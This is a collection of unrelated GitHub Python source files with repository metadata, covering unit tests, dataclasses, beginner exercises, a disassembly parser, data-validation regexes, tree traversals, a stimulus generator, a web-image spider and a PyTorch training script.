print(wr('rr'))","repo_name":"levpw/shyguybot","sub_path":"ta.py","file_name":"ta.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4483894698","text":"#test file\nimport unittest \nimport main\nfrom collections import Counter\nclass Test(unittest.TestCase):\n def test_kid_safe(self):\n words = Counter([\"hello\",\"world\"])\n self.assertAlmostEqual(main.kid_safe(words),1)\n words = Counter([\"hello\", \"sex\"])\n self.assertAlmostEqual(main.kid_safe(words), 0.9)\n \n#test love words\n def test_love(self):\n words = Counter([\"hello\", \"world\"])\n self.assertAlmostEqual(main.love(words), 0)\n words = Counter([\"hello\", \"love\"])\n self.assertTrue(main.love(words)>=0 )\n\n#test mood function \n def test_mood(self):\n words = Counter([\"hello\", \"happy\"])\n self.assertAlmostEqual(main.mood(words), 1)\n words = Counter([\"hello\", \"sad\"])\n self.assertAlmostEqual(main.mood(words), 0)\n words = Counter([\"hello\", \"world\"])\n self.assertAlmostEqual(main.mood(words), 0.5)\n words=Counter(['happy','sad'])\n self.assertAlmostEqual(main.mood(words), 0.5)\n words=Counter(['happy','sad','joy'])\n self.assertAlmostEqual(main.mood(words), 0.7)\n words=Counter(['happy','sad','weep'])\n self.assertAlmostEqual(main.mood(words), 0.3)\n words=Counter(['happy','sad','weep','cry'])\n self.assertAlmostEqual(main.mood(words), 1/4, delta=0.1)\n \n\n#test length \n def test_length(self):\n words = Counter([\"hello\", \"world\"])\n self.assertAlmostEqual(main.length(words), 0.00, delta=1e-4)\n words = Counter(['i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h'])\n self.assertAlmostEqual(main.length(words), 0.3, delta=1e-4)\n words = Counter(['i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h',\n 'i','j', 'a', 'b', 'c','d', 'e', 'f', 'g', 'h'])\n self.assertAlmostEqual(main.length(words), 1.0, delta=1e-4)\n \n\n#test complexity\n def test_complexity(self):\n words = Counter([\"hello\", \"world\"])\n self.assertAlmostEqual(main.complexity(words), 0)\n words = Counter([\"hello\", \"brandish\"])\n self.assertAlmostEqual(main.complexity(words), 0.2)\n \n \n#test read data \n def test_read_data(self):\n data = main.read_data(\"./Lyrics\")\n self.assertEqual(len(data[\"characterizations\"]),1001)\n \n \nsuite = unittest.defaultTestLoader.loadTestsFromTestCase(Test)\n# Run each test in suite\nunittest.TextTestRunner().run(suite)\n ","repo_name":"JessicaColumbia/Project9","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"7046612058","text":"from dataclasses import dataclass\nfrom typing import List\nimport datetime\n\n@dataclass\nclass TimeStamp:\n start: datetime.time\n end: datetime.time\n\n def calculateTimeDiffInSecs(self):\n placeholder_date = datetime.datetime(datetime.MINYEAR, 1, 1)\n new_start_datetime = datetime.datetime.combine(placeholder_date, self.start)\n new_end_datetime = datetime.datetime.combine(placeholder_date, self.end)\n\n return int((new_end_datetime - new_start_datetime).total_seconds())\n\n\n@dataclass\nclass DetailedInstance:\n detailedName: str\n timestamps: List[TimeStamp]\n totalTime: int = 0 # in seconds\n\n def __post_init__(self):\n for ts in self.timestamps:\n self.totalTime += ts.calculateTimeDiffInSecs()\n\n def addTimeStamp(self, ts: TimeStamp):\n if ts not in self.timestamps:\n self.timestamps.append(ts)\n self.totalTime += ts.calculateTimeDiffInSecs()\n\n\n@dataclass\nclass ApplicationWithInstances:\n appName: str\n instances: List[DetailedInstance]\n\n def updateOrAddInstance(self, di: DetailedInstance):\n instanceDetailedNames = [x.detailedName for x in self.instances]\n\n if di.detailedName not in instanceDetailedNames:\n self.instances.append(di)\n else:\n for instance in self.instances:\n if di.detailedName == instance.detailedName:\n for ts in di.timestamps:\n instance.addTimeStamp(ts)\n break\n\n #gets instances from another instance and based on them update this instance\n def updateBasedOnOther(self, other):\n if self.appName == other.appName:\n for i in other.instances:\n self.updateOrAddInstance(i)\n\n def sumOfTotalTimeForApplication(self):\n totalTimeForApp = 0\n for instance in self.instances:\n totalTimeForApp += instance.totalTime\n return totalTimeForApp\n","repo_name":"Barud21/ActivityMonitor","sub_path":"ApplicationObjects.py","file_name":"ApplicationObjects.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"780803219","text":"# Me Computer, Mandalay.\n# June 18, 2022\n# exercise_11.py\n# Leap year determination\n# if year is divisible by 4, it's a leap years\n# unless it's a century year not divisible by 400\n\ndef isLeap(year):\n if year % 4 != 0:\n return False\n elif year % 100 == 0:\n if year % 400 == 0:\n return True\n else:\n return False\n else:\n return True\n\ndef main():\n print(\"This program calculates whether a year is a leap year.\\n\")\n year = int(input(\"Enter a year: \"))\n if isLeap(year):\n print(year, \"is a leap year.\")\n else:\n print(year, \"is not a leap year.\")\n \nif __name__ == '__main__': main()","repo_name":"YeTun/An-Introduction-to-computer-science","sub_path":"chap07/exercise_11.py","file_name":"exercise_11.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72328955332","text":"from time import sleep\nprint('Menu de Opções')\n\ndecisor = 0 # Tomada de decisão do programa\n\nn1 = int(input('\\nPrimeiro número: '))\nn2 = int(input('Segundo número: '))\n\nwhile decisor != 1: # Enquanto o decisor não for 1 o programa fica em loop.\n menu = int(input('\\n[ 1 ] somar'\n '\\n[ 2 ] multiplicar'\n '\\n[ 3 ] saber o maior número'\n '\\n[ 4 ] digitar novos números'\n '\\n[ 5 ] sair do programa'\n '\\n->>> Escolha o que pretende fazer: '))\n if menu == 1:\n print('\\nA soma entre {} e {} é {}.'.format(n1, n2, (n1 + n2)))\n elif menu == 2:\n print('\\no resultado de {} x {} é {}.'.format(n1, n2, (n1 * n2)))\n elif menu == 3:\n if n1 > n2:\n maior = n1\n else:\n maior = n2\n print('\\nEntre {} e {} o maior é {}.'.format(n1, n2, maior))\n elif menu == 4:\n print('\\nInforme os números novamente.')\n n1 = int(input('Primeiro número: '))\n n2 = int(input('Segundo número: '))\n elif menu == 5:\n print('Finalizando...')\n decisor = 1\n else:\n print('\\nEntrada Inválida. Tente Novamente!')\n print('=-=' * 10)\n sleep(2)\nprint('\\nPrograma finalizado. Obrigado por usar :)')\n","repo_name":"da-ferreira/curso-em-video","sub_path":"Python/exercícios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30081458657","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport argparse\nimport re\nimport exceptions\nimport json\n\n######\n# BasicBlock data model\n#\n# .addr = Address of block (VMA)\n# .graph = Name of graph that BB is a part of\n# .instrs = Array of instructions\n# .next = Array of successor blocks\n######\n\n######\n# Instr data model\n#\n# .opcode = The operation/verb for the instruction\n# .operands = The individual operands (array)\n# .text = The disassembly row for the instruction\n# .raw = The byte values representing the instruction\n# .addr = The address of the instruction\n######\n\nclass Instr(object):\n def __init__(self, instr_line):\n '''Parses a single line of text into structured instruction\n representation'''\n self.opcode = ''\n self.operands = []\n self.text = ''\n self.raw = []\n self.addr = int(instr_line[0:instr_line.find(':')], 0)\n self.addr = '0x{:0>16x}'.format(int(instr_line[0:instr_line.find(':')], 0))\n\n # First, get the positions of the two pipes\n pipe_loc = [-1, -1]\n pipe_loc[0] = instr_line.find('|')\n pipe_loc[1] = instr_line.rfind('|')\n if pipe_loc[0] < 1 or pipe_loc[1] <= pipe_loc[0]:\n raise exceptions.SyntaxError(\"Poorly formatted line: {0}\".format(instr_line))\n\n # Next, extract the byte values:\n for v in instr_line[instr_line.find(':') + 1:pipe_loc[0]].strip().split(' '):\n self.raw.append(int('0x' + v, 0))\n\n # Next, extract the text describing the instruction\n self.text = instr_line[pipe_loc[1] + 1:].strip()\n self.opcode = self.text[0:self.text.find(' ')]\n self.operands = self.text[self.text.find(' '):].strip().split(', ')\n\n def __repr__(self):\n \"\"\"Return a JSON-format string representation of the elements\"\"\"\n return \"{\" + \"'addr': {a}, 'text': {t}, 'raw': [{r}], 'opcode': {o}, 'operands': {p}\".format(\n a=hex(self.addr), t=repr(self.text), o=repr(self.opcode), p=repr(self.operands),\n r=', '.join(hex(x) for x in self.raw)) + \"}\"\n\n def to_dict(self):\n \"\"\"Return the member values to make a dict\"\"\"\n return {'addr': self.addr,\n 'opcode': self.opcode,\n 'operands': self.operands,\n 'raw': self.raw,\n 'text': self.text}\n\nclass BasicBlock(object):\n def __init__(self, raw_lines):\n \"\"\"Parses a list of raw_lines into a BasicBlock structure, starting with\n the line after \"Basic block\". Will iterate through raw_lines and\n will return to caller once it parses an end-of-block situation\"\"\"\n self.instrs = []\n self.addr = ''\n self.graph = ''\n self.next = []\n\n cur_state = \"Begin\"\n\n for raw_line in (x.strip() for x in raw_lines):\n # If we reach block separator, then break out\n if raw_line == '':\n break\n\n # If we reach \"Successor blocks\" statement, save them and break\n succ_stmt = raw_line.find(' Successor blocks: ')\n if succ_stmt > 0:\n if raw_line[succ_stmt + 19:].find('none') == -1:\n self.next.extend(filter(lambda x: x != 'unknown',\n raw_line[succ_stmt + 19:].strip().split(', ')))\n else:\n self.next = []\n\n # If line contains a | then it is possibly going to have an\n # instruction\n elif raw_line.find('|') > 0:\n # If it is the first instruction, then save its addr as the\n # block addr\n if self.addr == '':\n self.addr = '0x{:0>16x}'.format(int(raw_line[0:raw_line.find(':')], 0))\n\n # Finally, parse the line into an Instr\n self.instrs.append(Instr(raw_line))\n\n def __repr__(self):\n \"\"\"Return a JSON-format string representation of the elements\"\"\"\n return \"{\" + \"'addr': {a}, 'instrs': {i}, 'graph': {g}, 'next': {n}\".format(a=self.addr,\n i=repr(self.instrs), g=repr(self.graph), n=repr(self.next)) + \"}\"\n\n def to_dict(self):\n \"\"\"Iterate through the member values like a dict\"\"\"\n return {'addr': self.addr,\n 'graph': self.graph,\n 'instrs': [i.to_dict() for i in self.instrs],\n 'next': self.next}\n\nfile_state = \"Nothing\"\n\ninf = file(sys.argv[1], 'r')\n\nbbs = []\n\nfor l in inf:\n if l.find('/* Interpretation PE */') > -1 or l.find('/* Interpretation ELF */') > -1:\n file_state = \"Parse\"\n\n if file_state == \"Parse\":\n if l.find(': Basic block '):\n bbs.append(BasicBlock(inf))\n\nb = {'blocks': [b.to_dict() for b in bbs]}\ns = json.dumps(b)\nprint(s)\n","repo_name":"ckane/mdna","sub_path":"rose2graph.py","file_name":"rose2graph.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25033194746","text":"import re\nfrom typing import Dict, Set\n\nINTEGER_REGEX = re.compile(r\"^[0-9]+$\")\nTIMESTAMP_REGEX = re.compile(r\"^[0-9]{10}$\")\nBASE64_REGEX = re.compile(r\"^[A-Za-z0-9+/]+={0,2}$\")\n\nUNFILTERED_ALL_REQUIRED_FIELDS: Set[str] = {\n \"action_source\",\n \"conversion_value\",\n \"currency_type\",\n \"event_type\",\n \"timestamp\",\n}\n\nUNFILTERED_ONE_OR_MORE_REQUIRED_FIELDS: Set[str] = {\n \"email\",\n \"device_id\",\n \"phone\",\n \"client_ip_address\",\n \"client_user_agent\",\n \"click_id\",\n \"login_id\",\n}\n\nUNFILTERED_FORMAT_VALIDATION_FOR_FIELD: Dict[str, re.Pattern] = {\n \"email\": re.compile(r\"^[a-f0-9]{64}$\"),\n \"device_id\": re.compile(r\"^([a-f0-9]{32}|[a-f0-9-]{36})$\"),\n \"timestamp\": TIMESTAMP_REGEX,\n \"currency_type\": re.compile(r\"^[a-z]+$\"),\n \"conversion_value\": INTEGER_REGEX,\n \"action_source\": re.compile(\n r\"^(email|website|phone_call|chat|physical_store|system_generated|other)$\"\n ),\n \"event_type\": re.compile(r\"^.+$\"),\n \"phone\": re.compile(r\"^[a-f0-9]{64}$\"),\n \"client_ip_address\": re.compile(\n r\"^(\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}|(::)?([a-fA-F0-9:]+:+)+[a-fA-F0-9]+(::)?)$\"\n ),\n \"client_user_agent\": re.compile(r\"^.+$\"),\n \"click_id\": re.compile(r\"^fb[.0-9]+$\"),\n \"login_id\": INTEGER_REGEX,\n \"browser_name\": re.compile(r\"^.+$\"),\n \"device_os\": re.compile(r\"^.+$\"),\n \"device_os_version\": re.compile(r\"^[.0-9]+$\"),\n \"data_source_id\": INTEGER_REGEX,\n}\n\nPA_ALL_REQUIRED_FIELDS: Set[str] = {\n \"id_\",\n \"conversion_timestamp\",\n \"conversion_value\",\n \"conversion_metadata\",\n}\n\nPA_FORMAT_VALIDATION_FOR_FIELD: Dict[str, re.Pattern] = {\n \"id_\": BASE64_REGEX,\n \"conversion_timestamp\": TIMESTAMP_REGEX,\n \"conversion_value\": INTEGER_REGEX,\n \"conversion_metadata\": INTEGER_REGEX,\n}\n\nPL_ALL_REQUIRED_FIELDS: Set[str] = {\n \"id_\",\n \"event_timestamp\",\n \"value\",\n}\n\nPL_FORMAT_VALIDATION_FOR_FIELD: Dict[str, re.Pattern] = {\n \"id_\": BASE64_REGEX,\n \"event_timestamp\": TIMESTAMP_REGEX,\n \"value\": INTEGER_REGEX,\n}\n","repo_name":"yutong-w/fbpcs-0125","sub_path":"fbpcs/infra/cloud_bridge/data_validation/validation_utility/expected_fields.py","file_name":"expected_fields.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42221821395","text":"## 二叉树的遍历\n\n# 树的遍历是树的一种重要的运算。所谓遍历是指对树中所有结点的信息的访问,即依次对树中每个结点访问一次且\n# 仅访问一次,我们把这种对所有节点的访问称为遍历(traversal)。那么树的两种重要的遍历模式是深度优先遍历\n# 和广度优先遍历,深度优先一般用递归,广度优先一般用队列。一般情况下能用递归实现的算法大部分也能用堆栈\n# 来实现\n\n\n###深度优先遍历\n\n#对于一颗二叉树,深度优先搜索(Depth First Search)是沿着树的深度遍历树的节点,尽可能深的搜索树的分支。那\n# 么深度遍历有重要的三种方法。这三种方式常被用于访问树的节点,它们之间的不同在于访问每个节点的次序不\n# 同。这三种遍历分别叫做先序遍历(preorder),中序遍历(inorder)和后序遍历(postorder)。\n\n##先序遍历 \n# 在先序遍历中,我们先访问根节点,然后递归使用先序遍历访问左子树,\n# 再递归使用先序遍历访问右子树根节点->左子树->右子树\n\ndef preorder(self, root):\n \"\"\" 递归实现先序遍历 \"\"\"\n if root == None:\n return\n print(root.elem)\n self.preorder(root.lchild)\n self.preorder(root.rchild)\n\n\n##中序遍历\n# 在中序遍历中,我们递归使用中序遍历访问左子树,然后访问根节点,\n# 最后再递归使用中序遍历访问右子树左子树->根节点->右子树\n\ndef inorder(self, root):\n \"\"\" 递归实现中序遍历 \"\"\"\n if root == None:\n return\n self.inorder(root.lchild)\n print(root.elem)\n self.inorder(root.rchild)\n\n\n##后序遍历\n# 在后序遍历中,我们先递归使用后序遍历访问左子树和右子树,\n# 最后访问根节点左子树->右子树->根节点\n\ndef postorder(self, root):\n \"\"\" 递归实现后续遍历 \"\"\"\n if root == None:\n self.postorder(root.lchild)\n self.postorder(root.rchild)\n print(root.elem)\n\n\n##广度优先遍历(层次遍历)\n\n#从树的root开始, 从上到下从左到右遍历整个树的节点\n\ndef breadth_travel(self, root):\n \"\"\" 利用队列实现树的层次遍历 \"\"\"\n if root == None:\n return\n queue = []\n queue.append(root)\n while queue:\n node = queue.pop(0)\n print(node.elem)\n if node.lchild != None:\n queue.append(node.lchild)\n if node.rchild != None:\n queue.append(node.rchild)","repo_name":"tangzixiong/python-project","sub_path":"data structure & algorithm/tree_traversal.py","file_name":"tree_traversal.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38497193513","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 17 12:08:05 2021\n\n@author: yl254115\n\"\"\"\nimport os\nimport itertools\n\npath2stimuli = '../../stimuli/'\n\nelements = {}\nelements['prefixes'] = ['re', 'un', 'dis']\nelements['suffixes'] = ['er', 'ly', 'able']\nelements['CVCs'] = ['kag', 'tis', 'viv']\nelements['affix_patterns'] = ['root', '1P', '1S', '2P', '1P1S', '2P1S']\n\ndef get_affixes(affix_pattern, elements):\n if affix_pattern == 'root':\n prefixes = ['']\n suffixes = ['']\n elif affix_pattern == '1P':\n prefixes = elements['prefixes']\n suffixes = ['']\n elif affix_pattern == '1S':\n prefixes = ['']\n suffixes = elements['suffixes'] \n elif affix_pattern == '2P':\n prefixes = ['unre', 'undis']\n suffixes = ['']\n elif affix_pattern == '1P1S':\n prefixes = elements['prefixes']\n suffixes = ['ly', 'able'] # only suffixes that can combine with verbs\n elif affix_pattern == '2P1S':\n prefixes = ['unre', 'undis']\n suffixes = elements['suffixes'] \n return prefixes, suffixes\n\n\ndef get_control_stimulus(prefix, CVC, suffix):\n \n #\n control_CVC = CVC\n \n #\n if prefix == 'unre':\n control_prefix = 'ernu'\n elif prefix == 'undis':\n control_prefix = 'nusid'\n else:\n control_prefix = prefix[::-1]\n \n #\n if suffix == 'able':\n control_suffix = 'elba'\n elif suffix == 'er':\n control_suffix = 're'\n elif suffix == 'ly':\n control_suffix = 'yl'\n elif suffix == '':\n control_suffix = ''\n \n control_stimulus = control_prefix + control_CVC + control_suffix\n return control_stimulus\n\nf_features = open(os.path.join(path2stimuli, 'pseudowords_features.csv'), 'w')\nf = open(os.path.join(path2stimuli, 'pseudowords.csv'), 'w')\n\ncnt = 0\ntarget_stimuli = []\ncontrol_stimuli = []\nfor CVC in elements['CVCs']:\n print(f'Current root: {CVC}')\n for affix_pattern in elements['affix_patterns']:\n prefixes, suffixes = get_affixes(affix_pattern, elements)\n for prefix, suffix in list(itertools.product(prefixes, suffixes)):\n target_stimulus = prefix + CVC + suffix\n cnt += 1\n print(target_stimulus)\n target_stimuli.append(target_stimulus)\n \n line = f'{cnt}, {target_stimulus}, target, {CVC}, {prefix}, {suffix}, {affix_pattern}\\n'\n f_features.write(line)\n f.write(f'{target_stimulus}\\n')\n \n if affix_pattern != 'root':\n control_stimulus = get_control_stimulus(prefix, CVC, suffix)\n cnt += 1\n print(control_stimulus)\n control_stimuli.append(control_stimulus)\n \n line = f'{cnt}, {control_stimulus}, control, {affix_pattern}, {CVC}, {prefix}, {suffix}\\n'\n f_features.write(line)\n f.write(f'{control_stimulus}\\n')\nf.close()\nf_features.close()\n \nprint(f'Number of stimuli {cnt}')\nn_repetitions = 8\nprint(f'Total time: {cnt*n_repetitions/2/60}')\n","repo_name":"yairlak/morphology_single_unit","sub_path":"code/stimuli/generate_complex_morph_pseudowords.py","file_name":"generate_complex_morph_pseudowords.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3223395845","text":"# importing panda library \r\nimport pandas as pd \r\n \r\n# readinag given csv file \r\n# and creating dataframe \r\ndataframe1 = pd.read_csv(\"ecg_data.dat\") \r\n \r\n# storing this dataframe in a csv file \r\ndataframe1.to_csv('ecg-data.csv', \r\n index = None) ","repo_name":"pratik-mk/ECG-Analysis","sub_path":"dat_to_csv.py","file_name":"dat_to_csv.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23354107510","text":"#Given a singly linked list L: L0→L1→…→Ln-1→Ln,\n#reorder it to: L0→Ln→L1→Ln-1→L2→Ln-2→…\n\n#You must do this in-place without altering the nodes' values.\n\n#For example,\n#Given {1,2,3,4}, reorder it to {1,4,2,3}.\n\n#### SOLUTION ####\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n if head is None or head.next is None:\n return\n\n # 3 steps\n # Step 1: Find the middle of the list\n p1, p2 = head, head\n \n while p2.next and p2.next.next:\n p1 = p1.next\n p2 = p2.next.next\n \n # Step 2: Reverse the half after middle\n # 1->2->3->4->5->6 to 1->2->3->6->5->4\n pre = p1\n prev = None\n curr = p1.next\n while curr:\n next = curr.next\n curr.next = prev\n prev = curr\n curr = next\n pre.next = prev\n \n # Step 3: Start reorder one by one\n # 1->2->3->6->5->4 to 1->6->2->5->3->4\n p1 = head\n p2 = pre.next\n while p1 != pre:\n pre.next = p2.next\n p2.next = p1.next\n p1.next = p2\n p1 = p2.next\n p2 = pre.next\n","repo_name":"sheelabhadra/LeetCode-Python","sub_path":"143_Reorder_List.py","file_name":"143_Reorder_List.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"19889505876","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom ferrari.items import FerrariItem\n\nclass Ferrari488Spider(CrawlSpider):\n name = 'ferrari488'\n allowed_domains = ['car.autohome.com.cn']\n start_urls = ['https://car.autohome.com.cn/pic/series/3720.html']\n\n rules = (\n Rule(LinkExtractor(allow=r\"https://car.autohome.com.cn/pic/series/3720.+\"),\n callback=\"parse_page\", follow=True),\n )\n\n def parse_page(self, response):\n category = response.xpath(\"//div[@class='uibox']/div/text()\").get()\n srcs = response.xpath(\"//div[contains(@class,'uibox-con')]/ul/li//img/@src\").getall()\n srcs = list(map(lambda x: response.urljoin(x.replace(\"t_\", \"\")), srcs))\n # srcs = list(map(lambda x: x.replace(\"t_\", \"\"), srcs))\n # srcs = list(map(lambda x: response.urljoin(x), srcs))\n yield FerrariItem(category=category, image_urls=srcs)\n\n\n\n def test_page(self, response):\n uiboxs = response.xpath(\"//div[@class='uibox']\")[1:]\n for uibox in uiboxs:\n category = uibox.xpath(\".//div[@class='uibox-title']/a/text()\").get()\n urls = uibox.xpath(\".//ul/li/a/img/@src\").getall()\n # for url in urls:\n # url = response.urljoin(url)\n # print(url)\n urls = list(map(lambda url: response.urljoin(url), urls))\n item = FerrariItem(category=category, image_urls=urls)\n yield item\n\n","repo_name":"Beasure/ferrari","sub_path":"ferrari/spiders/ferrari488.py","file_name":"ferrari488.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2643875522","text":"import os\nimport sys\nimport signal\nimport json\nimport logging\nimport argparse\nimport torch\nfrom model import *\nfrom model.loss import *\nfrom model.metric import *\nfrom data_loader import getDataLoader\nfrom trainer import *\nfrom logger import Logger\n\nlogging.basicConfig(level=logging.INFO, format='')\ndef set_procname(newname):\n from ctypes import cdll, byref, create_string_buffer\n newname=os.fsencode(newname)\n libc = cdll.LoadLibrary('libc.so.6') #Loading a 3rd party library C\n buff = create_string_buffer(len(newname)+1) #Note: One larger than the name (man prctl says that)\n buff.value = newname #Null terminated string as it should be\n libc.prctl(15, byref(buff), 0, 0, 0) #Refer to \"#define\" of \"/usr/include/linux/prctl.h\" for the misterious value 16 & arg[3..5] are zero as the man page says.\n\ndef main(config, resume):\n set_procname(config['name'])\n #np.random.seed(1234) I don't have a way of restarting the DataLoader at the same place, so this makes it totaly random\n train_logger = Logger()\n\n split = config['split'] if 'split' in config else 'train'\n data_loader, valid_data_loader = getDataLoader(config,split)\n #valid_data_loader = data_loader.split_validation()\n\n model = eval(config['arch'])(config['model'])\n model.summary()\n if type(config['loss'])==dict:\n loss={}#[eval(l) for l in config['loss']]\n for name,l in config['loss'].items():\n loss[name]=eval(l)\n else:\n loss = eval(config['loss'])\n if type(config['metrics'])==dict:\n metrics={}\n for name,m in config['metrics'].items():\n metrics[name]=[eval(metric) for metric in m]\n else:\n metrics = [eval(metric) for metric in config['metrics']]\n\n if 'class' in config['trainer']:\n trainerClass = eval(config['trainer']['class'])\n else:\n trainerClass = Trainer\n trainer = trainerClass(model, loss, metrics,\n resume=resume,\n config=config,\n data_loader=data_loader,\n valid_data_loader=valid_data_loader,\n train_logger=train_logger)\n\n def handleSIGINT(sig, frame):\n trainer.save()\n sys.exit(0)\n signal.signal(signal.SIGINT, handleSIGINT)\n\n print(\"Begin training\")\n trainer.train()\n\n\nif __name__ == '__main__':\n logger = logging.getLogger()\n\n parser = argparse.ArgumentParser(description='PyTorch Template')\n parser.add_argument('-c', '--config', default=None, type=str,\n help='config file path (default: None)')\n parser.add_argument('-r', '--resume', default=None, type=str,\n help='path to checkpoint (default: None)')\n parser.add_argument('-s', '--soft_resume', default=None, type=str,\n help='path to checkpoint that may or may not exist (default: None)')\n parser.add_argument('-g', '--gpu', default=None, type=int,\n help='gpu to use (overrides config) (default: None)')\n #parser.add_argument('-m', '--merged', default=False, action='store_const', const=True,\n # help='Use combine train and valid sets.')\n\n args = parser.parse_args()\n\n config = None\n if args.config is not None:\n config = json.load(open(args.config))\n if args.resume is None and args.soft_resume is not None:\n if not os.path.exists(args.soft_resume):\n print('WARNING: resume path ({}) was not found, starting from scratch'.format(args.soft_resume))\n else:\n args.resume = args.soft_resume\n if args.resume is not None and (config is None or 'override' not in config or not config['override']):\n if args.config is not None:\n logger.warning('Warning: --config overridden by --resume')\n config = torch.load(args.resume)['config']\n elif args.config is not None and args.resume is None:\n path = os.path.join(config['trainer']['save_dir'], config['name'])\n if os.path.exists(path):\n directory = os.fsencode(path)\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n if filename!='config.json': \n assert False, \"Path {} already used!\".format(path)\n\n assert config is not None\n\n if args.gpu is not None:\n config['gpu']=args.gpu\n print('override gpu to '+str(config['gpu']))\n\n if config['cuda']:\n with torch.cuda.device(config['gpu']):\n main(config, args.resume)\n else:\n main(config, args.resume)\n","repo_name":"herobd/Visual-Template-Free-Form-Parsing","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"44"} +{"seq_id":"15302908096","text":"import pandas as pd\nimport numpy as np\n# https://pbpython.com/pandas-list-dict.html\n\n\n# df = pd.DataFrame(calculation)\ndf = pd.read_csv('../data/anushree_testcase_2.csv')\nprint(df)\nbins = 100\n# df['binned'] = pd.cut(df['percentage'], bins)\npdf = pd.cut(df, bins).count()\nprint(pdf)\n\n# Perform a shape check on the DataFrame\n# ValueError: Buffer has wrong number of dimensions (expected 1, got 